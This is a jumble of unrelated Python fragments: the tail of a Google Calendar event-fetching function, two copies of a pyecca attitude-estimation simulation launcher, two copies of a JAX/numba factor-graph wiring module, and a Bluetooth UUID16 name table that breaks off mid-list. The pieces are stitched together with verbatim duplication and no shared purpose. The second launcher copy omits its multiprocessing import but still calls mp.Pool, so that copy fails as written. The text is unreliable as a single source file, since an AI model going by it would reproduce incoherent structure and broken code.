    log.info("Retrieving events from %s to %s", start_date, end_date)
    # Build a Calendar API client authenticated with the service account.
    service = googleapiclient.discovery.build(
        "calendar", "v3", credentials=_get_api_credentials(_API_SCOPES)
    )
    # singleEvents=True expands recurring events into individual instances;
    # the Calendar API requires this for orderBy="startTime".
    event_dicts: Iterator[dict[str, Any]] = (
        service.events()
        .list(
            calendarId=config.secret_config["calendarId"],
            timeMin=_format_as_zulu_date(start_date),
            timeMax=_format_as_zulu_date(end_date),
            singleEvents=True,
            orderBy="startTime",
        )
        .execute()
        .get("items", tuple())
    )
    return map(model.CalendarEvent.from_dict, event_dicts)
if __name__ == "__main__":
    from pprint import pprint

    # BUG FIX: retrieve_past_year_events() is a generator, so pprint would
    # only print its repr. Materialize it so the events themselves are shown.
    pprint(list(retrieve_past_year_events()))
import multiprocessing as mp
import numpy as np
from pyecca import replay
from pyecca import uros
from pyecca.estimators.attitude import algorithms
from pyecca.estimators.attitude.estimator import AttitudeEstimator
from pyecca.estimators.attitude.simulator import Simulator
# Baseline configuration shared by all launchers; callers override any
# subset of these keys (init_params rejects unknown keys).
default_params = {
    't0': 0,                    # start time passed through to the run config
    'tf': 1,                    # end time handed to core.run(until=...)
    'n_monte_carlo': 1,         # number of independent simulation runs
    'replay_log_file': None,    # log file path (replay mode only)
    'name': 'default',          # label printed when a run finishes
    'initialize': True,         # forwarded to each AttitudeEstimator
    'estimators': [],           # names of estimators to instantiate
    'x0': [0, 0, 0, 0, 0, 0],   # initial state for the Simulator
    'params': {}                # core parameter overrides (name -> value)
}
eqs = algorithms.eqs()  # equation sets, indexed by estimator name (see eqs[name] below)
def init_params(params):
    """Merge *params* over default_params, rejecting unknown keys.

    Args:
        params: dict of overrides; every key must exist in default_params.

    Returns:
        A new dict with the defaults applied and the overrides merged in.

    Raises:
        KeyError: if params contains a key not present in default_params.
    """
    p = dict(default_params)
    for k, v in params.items():
        # Idiom fix: test membership on the dict directly (was `k not in p.keys()`).
        if k not in p:
            raise KeyError(k)
        p[k] = v
    return p
def launch_sim(params):
    """Run one simulation with the given parameter overrides and return the
    logged data as an array."""
    p = init_params(params)
    core = uros.Core()
    Simulator(core, eqs, p['x0'])
    for est_name in p['estimators']:
        AttitudeEstimator(core, est_name, eqs[est_name], p['initialize'])
    logger = uros.Logger(core)
    core.init_params()
    for param_name, param_value in p['params'].items():
        core.set_param(param_name, param_value)
    core.run(until=p['tf'])
    print(p['name'], 'done')
    return logger.get_log_as_array()
def launch_monte_carlo_sim(params):
    """Run `n_monte_carlo` independent simulations.

    A single run forwards the parameters unchanged; multiple runs are
    renamed to their run index and distributed over a process pool.

    NOTE(review): the single-run branch returns a plain list holding one
    log array while the multi-run branch returns a stacked np.array —
    confirm that callers accept both shapes.
    """
    p = init_params(params)
    if p['n_monte_carlo'] == 1:
        d = dict(p)
        d.pop('n_monte_carlo')
        data = [launch_sim(d)]
    else:
        new_params = []
        for i in range(p['n_monte_carlo']):
            d = dict(p)
            d.pop('n_monte_carlo')
            d['name'] = i  # label each run by its index in progress output
            new_params.append(d)
        with mp.Pool(mp.cpu_count()) as pool:
            data = np.array(pool.map(launch_sim, new_params))
    return data
def launch_replay(params):
    """Replay a recorded ULog through the configured estimators and return
    the logged data as an array."""
    p = init_params(params)
    core = uros.Core()
    replay.ULogReplay(core, p['replay_log_file'])
    for est_name in p['estimators']:
        AttitudeEstimator(core, est_name, eqs[est_name], p['initialize'])
    logger = uros.Logger(core)
    core.init_params()
    for param_name, param_value in p['params'].items():
        core.set_param(param_name, param_value)
    core.run(until=p['tf'])
    print(p['name'], 'done')
    return logger.get_log_as_array()
import numpy as np
from pyecca import replay
from pyecca import uros
from pyecca.estimators.attitude import algorithms
from pyecca.estimators.attitude.estimator import AttitudeEstimator
from pyecca.estimators.attitude.simulator import Simulator
# Baseline configuration shared by all launchers; callers override any
# subset of these keys (init_params rejects unknown keys).
default_params = {
    't0': 0,                    # start time passed through to the run config
    'tf': 1,                    # end time handed to core.run(until=...)
    'n_monte_carlo': 1,         # number of independent simulation runs
    'replay_log_file': None,    # log file path (replay mode only)
    'name': 'default',          # label printed when a run finishes
    'initialize': True,         # forwarded to each AttitudeEstimator
    'estimators': [],           # names of estimators to instantiate
    'x0': [0, 0, 0, 0, 0, 0],   # initial state for the Simulator
    'params': {}                # core parameter overrides (name -> value)
}
eqs = algorithms.eqs()  # equation sets, indexed by estimator name (see eqs[name] below)
def init_params(params):
    """Merge *params* over default_params, rejecting unknown keys.

    Args:
        params: dict of overrides; every key must exist in default_params.

    Returns:
        A new dict with the defaults applied and the overrides merged in.

    Raises:
        KeyError: if params contains a key not present in default_params.
    """
    p = dict(default_params)
    for k, v in params.items():
        # Idiom fix: test membership on the dict directly (was `k not in p.keys()`).
        if k not in p:
            raise KeyError(k)
        p[k] = v
    return p
def launch_sim(params):
    """Run one simulation with the given parameter overrides and return the
    logged data as an array."""
    p = init_params(params)
    core = uros.Core()
    Simulator(core, eqs, p['x0'])
    for est_name in p['estimators']:
        AttitudeEstimator(core, est_name, eqs[est_name], p['initialize'])
    logger = uros.Logger(core)
    core.init_params()
    for param_name, param_value in p['params'].items():
        core.set_param(param_name, param_value)
    core.run(until=p['tf'])
    print(p['name'], 'done')
    return logger.get_log_as_array()
def launch_monte_carlo_sim(params):
    """Run `n_monte_carlo` independent simulations.

    A single run forwards the parameters unchanged; multiple runs are
    renamed to their run index and distributed over a process pool.

    NOTE(review): the single-run branch returns a plain list holding one
    log array while the multi-run branch returns a stacked np.array —
    confirm that callers accept both shapes.
    """
    p = init_params(params)
    if p['n_monte_carlo'] == 1:
        d = dict(p)
        d.pop('n_monte_carlo')
        data = [launch_sim(d)]
    else:
        new_params = []
        for i in range(p['n_monte_carlo']):
            d = dict(p)
            d.pop('n_monte_carlo')
            d['name'] = i  # label each run by its index in progress output
            new_params.append(d)
        with mp.Pool(mp.cpu_count()) as pool:
            data = np.array(pool.map(launch_sim, new_params))
    return data
def launch_replay(params):
    """Replay a recorded ULog through the configured estimators and return
    the logged data as an array."""
    p = init_params(params)
    core = uros.Core()
    replay.ULogReplay(core, p['replay_log_file'])
    for est_name in p['estimators']:
        AttitudeEstimator(core, est_name, eqs[est_name], p['initialize'])
    logger = uros.Logger(core)
    core.init_params()
    for param_name, param_value in p['params'].items():
        core.set_param(param_name, param_value)
    core.run(until=p['tf'])
    print(p['name'], 'done')
    return logger.get_log_as_array()
from dataclasses import asdict, dataclass
from typing import List, Sequence, Tuple, Union
import jax
import jax.numpy as jnp
import numba as nb
import numpy as np
@jax.tree_util.register_pytree_node_class
@dataclass(frozen=True, eq=False)
class Wiring:
    """Wiring for factors.

    Registered as a JAX pytree so instances can cross jit/vmap boundaries.

    Args:
        edges_num_states: Array of shape (num_edges,)
            Number of states for the variables connected to each edge
        var_states_for_edges: Array of shape (num_edge_states,)
            Global variable state indices for each edge state
    """

    edges_num_states: Union[np.ndarray, jnp.ndarray]
    var_states_for_edges: Union[np.ndarray, jnp.ndarray]

    def __post_init__(self):
        # Freeze every numpy field so the (frozen) dataclass is deeply immutable.
        for field in self.__dataclass_fields__:
            if isinstance(getattr(self, field), np.ndarray):
                getattr(self, field).flags.writeable = False

    def tree_flatten(self):
        # Pytree protocol: children are the field values, aux data the structure.
        return jax.tree_util.tree_flatten(asdict(self))

    @classmethod
    def tree_unflatten(cls, aux_data, children):
        # Pytree protocol: rebuild the dataclass from the flattened leaves.
        return cls(**aux_data.unflatten(children))
@dataclass(frozen=True, eq=False)
class Factor:
    """A factor

    Args:
        variables: List of variables connected by the Factor.
            Each variable is represented by a tuple (variable hash, variable num_states)
        log_potentials: Array of log potentials for this factor.

    Raises:
        NotImplementedError: If compile_wiring is not implemented
    """

    variables: List[Tuple[int, int]]
    log_potentials: np.ndarray

    def __post_init__(self):
        # Subclasses must provide compile_wiring; fail fast at construction time.
        if not hasattr(self, "compile_wiring"):
            raise NotImplementedError(
                "Please implement compile_wiring in for your factor"
            )

    @staticmethod
    def concatenate_wirings(wirings: Sequence) -> Wiring:
        """Concatenate a list of Wirings

        Args:
            wirings: A list of Wirings

        Returns:
            Concatenated Wiring
        """
        raise NotImplementedError(
            "Please subclass the Wiring class and override this method."
        )
@nb.jit(parallel=False, cache=True, fastmath=True, nopython=True)
def _compile_var_states_numba(
    var_states_for_edges: np.ndarray,
    num_states_cumsum: np.ndarray,
    var_states: np.ndarray,
) -> np.ndarray:
    """Fast numba computation of the var_states_for_edges of a Wiring.

    var_states_for_edges is updated in-place.

    Args:
        var_states_for_edges: output buffer, one entry per edge state
        num_states_cumsum: cumulative state counts per variable
            (length num_variables + 1)
        var_states: first global state index of each variable
    """
    # NOTE(review): nb.prange with parallel=False runs sequentially; flip
    # parallel=True if this loop ever becomes a bottleneck.
    for variable_idx in nb.prange(num_states_cumsum.shape[0] - 1):
        start_variable, end_variable = (
            num_states_cumsum[variable_idx],
            num_states_cumsum[variable_idx + 1],
        )
        # Fill this variable's slots with consecutive global state indices.
        var_states_for_edges[start_variable:end_variable] = var_states[
            variable_idx
        ] + np.arange(end_variable - start_variable)
from dataclasses import asdict, dataclass
from typing import List, Sequence, Tuple, Union
import jax
import jax.numpy as jnp
import numba as nb
import numpy as np
@jax.tree_util.register_pytree_node_class
@dataclass(frozen=True, eq=False)
class Wiring:
    """Wiring for factors.

    Registered as a JAX pytree so instances can cross jit/vmap boundaries.

    Args:
        edges_num_states: Array of shape (num_edges,)
            Number of states for the variables connected to each edge
        var_states_for_edges: Array of shape (num_edge_states,)
            Global variable state indices for each edge state
    """

    edges_num_states: Union[np.ndarray, jnp.ndarray]
    var_states_for_edges: Union[np.ndarray, jnp.ndarray]

    def __post_init__(self):
        # Freeze every numpy field so the (frozen) dataclass is deeply immutable.
        for field in self.__dataclass_fields__:
            if isinstance(getattr(self, field), np.ndarray):
                getattr(self, field).flags.writeable = False

    def tree_flatten(self):
        # Pytree protocol: children are the field values, aux data the structure.
        return jax.tree_util.tree_flatten(asdict(self))

    @classmethod
    def tree_unflatten(cls, aux_data, children):
        # Pytree protocol: rebuild the dataclass from the flattened leaves.
        return cls(**aux_data.unflatten(children))
@dataclass(frozen=True, eq=False)
class Factor:
    """A factor

    Args:
        variables: List of variables connected by the Factor.
            Each variable is represented by a tuple (variable hash, variable num_states)
        log_potentials: Array of log potentials for this factor.

    Raises:
        NotImplementedError: If compile_wiring is not implemented
    """

    variables: List[Tuple[int, int]]
    log_potentials: np.ndarray

    def __post_init__(self):
        # Subclasses must provide compile_wiring; fail fast at construction time.
        if not hasattr(self, "compile_wiring"):
            raise NotImplementedError(
                "Please implement compile_wiring in for your factor"
            )

    @staticmethod
    def concatenate_wirings(wirings: Sequence) -> Wiring:
        """Concatenate a list of Wirings

        Args:
            wirings: A list of Wirings

        Returns:
            Concatenated Wiring
        """
        raise NotImplementedError(
            "Please subclass the Wiring class and override this method."
        )
@nb.jit(parallel=False, cache=True, fastmath=True, nopython=True)
def _compile_var_states_numba(
    var_states_for_edges: np.ndarray,
    num_states_cumsum: np.ndarray,
    var_states: np.ndarray,
) -> np.ndarray:
    """Fast numba computation of the var_states_for_edges of a Wiring.

    var_states_for_edges is updated in-place.

    Args:
        var_states_for_edges: output buffer, one entry per edge state
        num_states_cumsum: cumulative state counts per variable
            (length num_variables + 1)
        var_states: first global state index of each variable
    """
    # NOTE(review): nb.prange with parallel=False runs sequentially; flip
    # parallel=True if this loop ever becomes a bottleneck.
    for variable_idx in nb.prange(num_states_cumsum.shape[0] - 1):
        start_variable, end_variable = (
            num_states_cumsum[variable_idx],
            num_states_cumsum[variable_idx + 1],
        )
        # Fill this variable's slots with consecutive global state indices.
        var_states_for_edges[start_variable:end_variable] = var_states[
            variable_idx
        ] + np.arange(end_variable - start_variable)
uuid16_dict = {
0x0001: "SDP",
0x0003: "RFCOMM",
0x0005: "TCS-BIN",
0x0007: "ATT",
0x0008: "OBEX",
0x000f: "BNEP",
0x0010: "UPNP",
0x0011: "HIDP",
0x0012: "Hardcopy Control Channel",
0x0014: "Hardcopy Data Channel",
0x0016: "Hardcopy Notification",
0x0017: "AVCTP",
0x0019: "AVDTP",
0x001b: "CMTP",
0x001e: "MCAP Control Channel",
0x001f: "MCAP Data Channel",
0x0100: "L2CAP",
# 0x0101 to 0x0fff undefined */
0x1000: "Service Discovery Server Service Class",
0x1001: "Browse Group Descriptor Service Class",
0x1002: "Public Browse Root",
# 0x1003 to 0x1100 undefined */
0x1101: "Serial Port",
0x1102: "LAN Access Using PPP",
0x1103: "Dialup Networking",
0x1104: "IrMC Sync",
0x1105: "OBEX Object Push",
0x1106: "OBEX File Transfer",
0x1107: "IrMC Sync Command",
0x1108: "Headset",
0x1109: "Cordless Telephony",
0x110a: "Audio Source",
0x110b: "Audio Sink",
0x110c: "A/V Remote Control Target",
0x110d: "Advanced Audio Distribution",
0x110e: "A/V Remote Control",
0x110f: "A/V Remote Control Controller",
0x1110: "Intercom",
0x1111: "Fax",
0x1112: "Headset AG",
0x1113: "WAP",
0x1114: "WAP Client",
0x1115: "PANU",
0x1116: "NAP",
0x1117: "GN",
0x1118: "Direct Printing",
0x1119: "Reference Printing",
0x111a: "Basic Imaging Profile",
0x111b: "Imaging Responder",
0x111c: "Imaging Automatic Archive",
0x111d: "Imaging Referenced Objects",
0x111e: "Handsfree",
0x111f: "Handsfree Audio Gateway",
0x1120: "Direct Printing Refrence Objects Service",
0x1121: "Reflected UI",
0x1122: "Basic Printing",
0x1123: "Printing Status",
0x1124: "Human Interface Device Service",
0x1125: "Hardcopy Cable Replacement",
0x1126: "HCR Print",
0x1127: "HCR Scan",
0x1128: "Common ISDN Access",
# 0x1129 and 0x112a undefined */
0x112d: "SIM Access",
0x112e: "Phonebook Access Client",
0x112f: "Phonebook Access Server",
0x1130: "Phonebook Access",
0x1131: "Headset HS",
0x1132: "Message Access Server",
0x1133: "Message Notification Server",
0x1134: "Message Access Profile",
0x1135: "GNSS",
0x1136: "GNSS Server",
0x1137: "3D Display",
0x1138: "3D Glasses",
0x1139: "3D Synchronization",
0x113a: "MPS Profile",
0x113b: "MPS Service",
# 0x113c to 0x11ff undefined */
0x1200: "PnP Information",
0x1201: "Generic Networking",
0x1202: "Generic File Transfer",
0x1203: "Generic Audio",
0x1204: "Generic Telephony",
0x1205: "UPNP Service",
0x1206: "UPNP IP Service",
0x1300: "UPNP IP PAN",
0x1301: "UPNP IP LAP",
0x1302: "UPNP IP L2CAP",
0x1303: "Video Source",
0x1304: "Video Sink",
0x1305: "Video Distribution",
# 0x1306 to 0x13ff undefined */
0x1400: "HDP",
0x1401: "HDP Source",
0x1402: "HDP Sink",
# 0x1403 to 0x17ff undefined */
0x1800: "Generic Access Profile",
0x1801: "Generic Attribute Profile",
0x1802: "Immediate Alert",
0x1803: "Link Loss",
0x1804: "Tx Power",
0x1805: "Current Time Service",
0x1806: "Reference Time Update Service",
0x1807: "Next DST Change Service",
0x1808: "Glucose",
0x1809: "Health Thermometer",
0x180a: "Device Information",
# 0x180b and 0x180c undefined */
0x180d: "Heart Rate",
0x180e: "Phone Alert Status Service",
0x180f: "Battery Service",
0x1810: "Blood Pressure",
0x1811: "Alert Notification Service",
0x1812: "Human Interface Device",
0x1813: "Scan Parameters",
0x1814: "Running Speed and Cadence",
0x1815: "Automation IO",
0x1816: "Cycling Speed and Cadence",
# 0x1817 undefined */
0x1818: "Cycling Power",
0x1819: "Location and Navigation",
0x181a: "Environmental Sensing",
0x181b: "Body Composition",
0x181c: "User Data",
0x181d: "Weight Scale",
0x181e: "Bond Management",
0x181f: "Continuous Glucose Monitoring",
0x1820: "Internet Protocol Support",
0x1821: "Indoor Positioning",
0x1822: "Pulse Oximeter",
0x1823: "HTTP Proxy",
0x1824: "Transport Discovery",
0x1825: "Object Transfer",
0x1826: "Fitness Machine",
0x1827: "Mesh Provisioning",
0x1828: "Mesh Proxy",
# 0x1829 to 0x27ff undefined */
0x2800: "Primary Service",
0x2801: "Secondary Service",
0x2802: "Include",
0x2803: "Characteristic",
# 0x2804 to 0x28ff undefined */
0x2900: "Characteristic Extended Properties",
0x2901: "Characteristic User Description",
0x2902: "Client Characteristic Configuration",
0x2903: "Server Characteristic Configuration",
0x2904: "Characteristic Format",
0x2905: "Characteristic Aggregate Formate",
0x2906: "Valid Range",
0x2907: "External Report Reference",
0x2908: "Report Reference",
0x2909: "Number of Digitals",
0x290a: "Value Trigger Setting",
0x290b: "Environmental Sensing Configuration",
0x290c: "Environmental Sensing Measurement",
0x290d: "Environmental Sensing Trigger Setting",
0x290e: "Time Trigger Setting",
# 0x290f to 0x29ff undefined */
0x2a00: "Device Name",
0x2a01: "Appearance",
0x2a02: "Peripheral Privacy Flag",
0x2a03: "Reconnection Address",
0x2a04: "Peripheral Preferred Connection Parameters",
0x2a05: "Service Changed",
0x2a06: "Alert Level",
0x2a07: "Tx Power Level",
0x2a08: "Date Time",
0x2a09: "Day of Week",
0x2a0a: "Day Date Time",
# 0x2a0b undefined */
0x2a0c: "Exact Time 256",
0x2a0d: "DST Offset",
0x2a0e: "Time Zone",
0x2a0f: "Local Time Information",
# 0x2a10 undefined */
0x2a11: "Time with DST",
0x2a12: "Time Accuracy",
0x2a13: "Time Source",
0x2a14: "Reference Time Information",
# 0x2a15 undefined */
0x2a16: "Time Update Control Point",
0x2a17: "Time Update State",
0x2a18: "Glucose Measurement",
0x2a19: "Battery Level",
# 0x2a1a and 0x2a1b undefined */
0x2a1c: "Temperature Measurement",
0x2a1d: "Temperature Type",
0x2a1e: "Intermediate Temperature",
# 0x2a1f and 0x2a20 undefined */
0x2a21: "Measurement Interval",
0x2a22: "Boot Keyboard Input Report",
0x2a23: "System ID",
0x2a24: "Model Number String",
0x2a25: "Serial Number String",
0x2a26: "Firmware Revision String",
0x2a27: "Hardware Revision String",
0x2a28: "Software Revision String",
0x2a29: "Manufacturer Name String",
0x2a2a: "IEEE 11073-20601 Regulatory Cert. Data List",
0x2a2b: "Current Time",
0x2a2c: "Magnetic Declination",
# 0x2a2d to 0x2a30 undefined */
0x2a31: "Scan Refresh",
0x2a32: "Boot Keyboard Output Report",
0x2a33: "Boot Mouse Input Report",
0x2a34: "Glucose Measurement Context",
0x2a35: "Blood Pressure Measurement",
0x2a36: "Intermediate Cuff Pressure",
0x2a37: "Heart Rate Measurement",
0x2a38: "Body Sensor Location",
0x2a39: "Heart Rate Control Point",
# 0x2a3a to 0x2a3e undefined */
0x2a3f: "Alert Status",
0x2a40: "Ringer Control Point",
0x2a41: "Ringer Setting",
0x2a42: "Alert Category ID Bit Mask",
0x2a43: "Alert Category ID",
0x2a44: "Alert Notification Control Point",
0x2a45: "Unread Alert Status",
0x2a46: "New Alert",
0x2a47: "Supported New Alert Category",
0x2a48: "Supported Unread Alert Category",
0x2a49: "Blood Pressure Feature",
0x2a4a: "HID Information",
0x2a4b: "Report Map",
0x2a4c: "HID Control Point",
0x2a4d: "Report",
0x2a4e: "Protocol Mode",
0x2a4f: "Scan Interval Window",
0x2a50: "PnP ID",
0x2a51: "Glucose Feature",
0x2a52: "Record Access Control Point",
0x2a53: "RSC Measurement",
0x2a54: "RSC Feature",
0x2a55: "SC Control Point",
0x2a56: "Digital",
# 0x2a57 undefined */
0x2a58: "Analog",
# 0x2a59 undefined */
0x2a5a: "Aggregate",
0x2a5b: "CSC Measurement",
0x2a5c: "CSC Feature",
0x2a5d: "Sensor Location",
# 0x2a5e to 0x2a62 undefined */
0x2a63: "Cycling Power Measurement",
0x2a64: "Cycling Power Vector",
0x2a65: "Cycling Power Feature",
0x2a66: "Cycling Power Control Point",
0x2a67: "Location and Speed",
0x2a68: "Navigation",
0x2a69: "Position Quality",
0x2a6a: "LN Feature",
0x2a6b: "LN Control Point",
0x2a6c: "Elevation",
0x2a6d: "Pressure",
0x2a6e: "Temperature",
0x2a6f: "Humidity",
0x2a70: "True Wind Speed",
0x2a71: "True Wind Direction",
0x2a72: "Apparent Wind Speed",
0x2a73: "Apparent Wind Direction",
0x2a74: "Gust Factor",
0x2a75: "Pollen Concentration",
0x2a76: "UV Index",
0x2a77: "Irradiance",
0x2a78: "Rainfall",
0x2a79: "Wind Chill",
0x2a7a: "Heat Index",
0x2a7b: "Dew Point",
0x2a7c: "Trend",
0x2a7d: "Descriptor Value Changed",
0x2a7e: "Aerobic Heart Rate Lower Limit",
0x2a7f: "Aerobic Threshold",
0x2a80: "Age",
0x2a81: "Anaerobic Heart Rate Lower Limit",
0x2a82: "Anaerobic Heart Rate Upper Limit",
0x2a83: "Anaerobic Threshold",
0x2a84: "Aerobic Heart Rate Upper Limit",
0x2a85: "Date of Birth",
0x2a86: "Date of Threshold Assessment",
0x2a87: "Email Address",
0x2a88: "Fat Burn Heart Rate Lower Limit",
0x2a89: "Fat Burn Heart Rate Upper Limit",
0x2a8a: "<NAME>",
0x2a8b: "Five Zone Heart Rate Limits",
0x2a8c: "Gender",
0x2a8d: "Heart Rate Max",
0x2a8e: "Height",
0x2a8f: "Hip Circumference",
0x2a90: "<NAME>",
0x2a91: "Maximum Recommended Heart Rate",
0x2a92: "Resting Heart Rate",
0x2a93: "Sport Type for Aerobic/Anaerobic Thresholds",
0x2a94: "Three Zone Heart Rate Limits",
0x2a95: "Two Zone Heart Rate Limit",
0x2a96: "VO2 Max",
0x2a97: "Waist Circumference",
0x2a98: "Weight",
0x2a99: "Database Change Increment",
0x2a9a: "User Index",
0x2a9b: "Body Composition Feature",
0x2a9c: "Body Composition Measurement",
0x2a9d: "Weight Measurement",
0x2a9e: "Weight Scale Feature",
0x2a9f: "User Control Point",
0x2aa0: "Magnetic Flux Density - 2D",
0x2aa1: "Magnetic Flux Density - 3D",
0x2aa2: "Language",
0x2aa3: "Barometric Pressure Trend",
0x2aa4: "Bond Management Control Point",
0x2aa5: "Bond Management Feature",
0x2aa6: "Central Address Resolution",
0x2aa7: "CGM Measurement",
0x2aa8: "CGM Feature",
0x2aa9: "CGM Status",
0x2aaa: "CGM Session Start Time",
0x2aab: "CGM Session Run Time",
0x2aac: "CGM Specific Ops Control Point",
0x2aad: "Indoor Positioning Configuration",
0x2aae: "Latitude",
0x2aaf: "Longitude",
0x2ab0: "Local North Coordinate",
0x2ab1: "Local East Coordinate",
0x2ab2: "Floor Number",
0x2ab3: "Altitude",
0x2ab4: "Uncertainty",
0x2ab5: "Location Name",
0x2ab6: "URI",
0x2ab7: "HTTP Headers",
0x2ab8: "HTTP Status Code",
0x2ab9: "HTTP Entity Body",
0x2aba: "HTTP Control Point",
0x2abb: "HTTPS Security",
0x2abc: "TDS Control Point",
0x2abd: "OTS Feature",
0x2abe: "Object Name",
0x2abf: "Object Type",
0x2ac0: "Object Size",
0x2ac1: "Object First-Created",
0x2ac2: "Object Last-Modified",
0x2ac3: "Object ID",
0x2ac4: "Object Properties",
0x2ac5: "Object Action Control Point",
0x2ac6: "Object List Control Point",
0x2ac7: "Object List Filter",
0x2ac8: "Object Changed",
0x2ac9: "Resolvable Private Address Only",
# 0x2aca and 0x2acb undefined */
0x2acc: "Fitness Machine Feature",
0x2acd: "Treadmill Data",
0x2ace: "Cross Trainer Data",
0x2acf: "Step Climber Data",
0x2ad0: "Stair Climber Data",
0x2ad1: "Rower Data",
0x2ad2: "Indoor Bike Data",
0x2ad3: "Training Status",
0x2ad4: "Supported Speed Range",
0x2ad5: "Supported Inclination Range",
0x2ad6: "Supported Resistance Level Range",
0x2ad7: "Supported Heart Rate Range",
0x2ad8: "Supported Power Range",
0x2ad9: "Fitness Machine Control Point",
0x2ada: "Fitness Machine Status",
0x2adb: "Mesh Provisioning Data In",
0x2adc: "Mesh Provisioning Data Out",
0x2add: "Mesh Proxy Data In",
0x2ade: "Mesh Proxy Data Out",
# vendor defined */
0xfeff: "GN Netcom",
0xfefe: "GN ReSound A/S",
0xfefd: "Gimbal: Inc.",
0xfefc: "Gimbal: Inc.",
0xfefb: "Stollmann E+V GmbH",
0xfefa: "PayPal: Inc.",
0xfef9: "PayPal: Inc.",
0xfef8: "Aplix Corporation",
0xfef7: "Aplix Corporation",
0xfef6: "Wicentric: Inc.",
0xfef5: "Dialog Semiconductor GmbH",
0xfef4: "Google",
0xfef3: "Google",
0xfef2: "CSR",
0xfef1: "CSR",
0xfef0: "Intel",
0xfeef: "Polar Electro Oy",
0xfeee: "Polar Electro Oy",
0xfeed: "Tile: Inc.",
0xfeec: "Tile: Inc.",
0xfeeb: "Swirl Networks: Inc.",
0xfeea: "Swirl Networks: Inc.",
0xfee9: "Quintic Corp.",
0xfee8: "Quintic Corp.",
0xfee7: "Tencent Holdings Limited",
0xfee6: "Seed Labs: Inc.",
0xfee5: "Nordic Semiconductor ASA",
0xfee4: "Nordic Semiconductor ASA",
0xfee3: "Anki: Inc.",
0xfee2: "Anki: Inc.",
0xfee1: "Anhui Huami Information Technology Co.",
0xfee0: "Anhui Huami Information Technology Co.",
0xfedf: "Design SHIFT",
0xfede: "Coin: Inc.",
0xfedd: "Jawbone",
0xfedc: "Jawbone",
0xfedb: "Perka: Inc.",
0xfeda: "ISSC Technologies Corporation",
0xfed9: "Pebble Technology Corporation",
0xfed8: "Google",
0xfed7: "Broadcom Corporation",
0xfed6: "Broadcom Corporation",
0xfed5: "Plantronics Inc.",
0xfed4: "Apple: Inc.",
0xfed3: "Apple: Inc.",
0xfed2: "Apple: Inc.",
0xfed1: "Apple: Inc.",
0xfed0: "Apple: Inc.",
0xfecf: "Apple: Inc.",
0xfece: "Apple: Inc.",
0xfecd: "Apple: Inc.",
0xfecc: "Apple: Inc.",
0xfecb: "Apple: Inc.",
0xfeca: "Apple: Inc.",
0xfec9: "Apple: Inc.",
0xfec8: "Apple: Inc.",
0xfec7: "Apple: Inc.",
0xfec6: "Kocomojo: LLC",
0xfec5: "Realtek Semiconductor Corp.",
0xfec4: "PLUS Location Systems",
0xfec3: "360fly: Inc.",
0xfec2: "Blue Spark Technologies: Inc.",
0xfec1: "KDDI Corporation",
0xfec0: "KDDI Corporation",
0xfebf: "Nod: Inc.",
0xfebe: "Bose Corporation",
0xfebd: "Clover Network: Inc.",
0xfebc: "Dexcom: Inc.",
0xfebb: "adafruit industries",
0xfeba: "Tencent Holdings Limited",
0xfeb9: "LG Electronics",
0xfeb8: "Facebook: Inc.",
0xfeb7: "Facebook: Inc.",
0xfeb6: "Vencer Co: Ltd",
0xfeb5: "WiSilica Inc.",
0xfeb4: "WiSilica Inc.",
0xfeb3: "Taobao",
0xfeb2: "Microsoft Corporation",
0xfeb1: "Electronics Tomorrow Limited",
0xfeb0: "Nest Labs Inc.",
0xfeaf: "Nest Labs Inc.",
0xfeae: "Nokia Corporation",
0xfead: "Nokia Corporation",
0xfeac: "Nokia Corporation",
0xfeab: "Nokia Corporation",
0xfeaa: "Google",
0xfea9: "Savant Systems LLC",
0xfea8: "Savant Systems LLC",
0xfea7: "UTC Fire and Security",
0xfea6: "GoPro: Inc.",
0xfea5: "GoPro: Inc.",
0xfea4: "Paxton Access Ltd",
0xfea3: "ITT Industries",
0xfea2: "Intrepid Control Systems: Inc.",
0xfea1: "Intrepid Control Systems: Inc.",
0xfea0: "Google",
0xfe9f: "Google",
0xfe9e: "Dialog Semiconductor B.V.",
0xfe9d: "Mobiquity Networks Inc",
0xfe9c: "GSI Laboratories: Inc.",
0xfe9b: "Samsara Networks: Inc",
0xfe9a: "Estimote",
0xfe99: "Currant: Inc.",
0xfe98: "Currant: Inc.",
0xfe97: "Tesla Motor Inc.",
0xfe96: "Tesla Motor Inc.",
0xfe95: "Xiaomi Inc.",
0xfe94: "OttoQ Inc.",
0xfe93: "OttoQ Inc.",
0xfe92: "Jarden Safety & Security",
0xfe91: "Shanghai Imilab Technology Co.,Ltd",
0xfe90: "JUMA",
0xfe8f: "CSR",
0xfe8e: "ARM Ltd",
0xfe8d: "Interaxon Inc.",
0xfe8c: "TRON Forum",
0xfe8b: "Apple: Inc.",
0xfe8a: "Apple: Inc.",
0xfe89: "B&O Play A/S",
0xfe88: "SALTO SYSTEMS S.L.",
0xfe87: "Qingdao Yeelink Information Technology Co.: Ltd. ( 青岛亿联客信息技术有限公司 )",
0xfe86: "HUAWEI Technologies Co.: Ltd. ( 华为技术有限公司 )",
0xfe85: "RF Digital Corp",
0xfe84: "RF Digital Corp",
0xfe83: "Blue Bite",
0xfe82: "Medtronic Inc.",
0xfe81: "Medtronic Inc.",
0xfe80: "Doppler Lab",
0xfe7f: "Doppler Lab",
0xfe7e: "Awear Solutions Ltd",
0xfe7d: "Aterica Health Inc.",
0xfe7c: "Stollmann E+V GmbH",
0xfe7b: "Orion Labs: Inc.",
0xfe7a: "Bragi GmbH",
0xfe79: "Zebra Technologies",
0xfe78: "Hewlett-Packard Company",
0xfe77: "Hewlett-Packard Company",
0xfe76: "TangoMe",
0xfe75: "TangoMe",
0xfe74: "unwire",
0xfe73: "St. Jude Medical: Inc.",
0xfe72: "St. Jude Medical: Inc.",
0xfe71: "Plume Design Inc",
0xfe70: "Beijing Jingdong Century Trading Co.: Ltd.",
0xfe6f: "LINE Corporation",
0xfe6e: "The University of Tokyo",
0xfe6d: "The University of Tokyo",
0xfe6c: "TASER International: Inc.",
0xfe6b: "TASER International: Inc.",
0xfe6a: "Kontakt Micro-Location Sp. z o.o.",
0xfe69: "Qualcomm Life Inc",
0xfe68: "Qualcomm Life Inc",
0xfe67: "Lab Sensor Solutions",
0xfe66: "Intel Corporation",
0xfe65: "CHIPOLO d.o.o.",
0xfe64: "Siemens AG",
0xfe63: "Connected Yard: Inc.",
0xfe62: "Indagem Tech LLC",
0xfe61: "Logitech International SA",
0xfe60: "Lierda Science & Technology Group Co.: Ltd.",
0xfe5F: "Eyefi: Inc.",
0xfe5E: "Plastc Corporation",
0xfe5D: "Grundfos A/S",
